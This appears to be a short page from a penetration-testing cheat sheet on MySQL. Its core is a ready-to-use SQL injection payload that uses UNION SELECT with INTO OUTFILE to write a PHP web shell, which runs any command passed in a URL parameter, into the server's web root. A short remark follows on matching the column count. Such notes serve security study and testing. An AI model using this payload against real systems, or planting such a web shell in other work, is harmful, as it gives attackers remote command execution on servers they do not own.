MYSQL

MySQL is the most commonly used database along with its open-source based version, Mariadb.

FileWrite

If the web application is susceptible to SQL injection, then the following command can be used to do a file write on the server,

' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

Since the above command is an union, the number of columns has to match with the original table to which the union is made. The number of columns can be figured out by a series of steps mentioned in the SQL injection section.

Last updated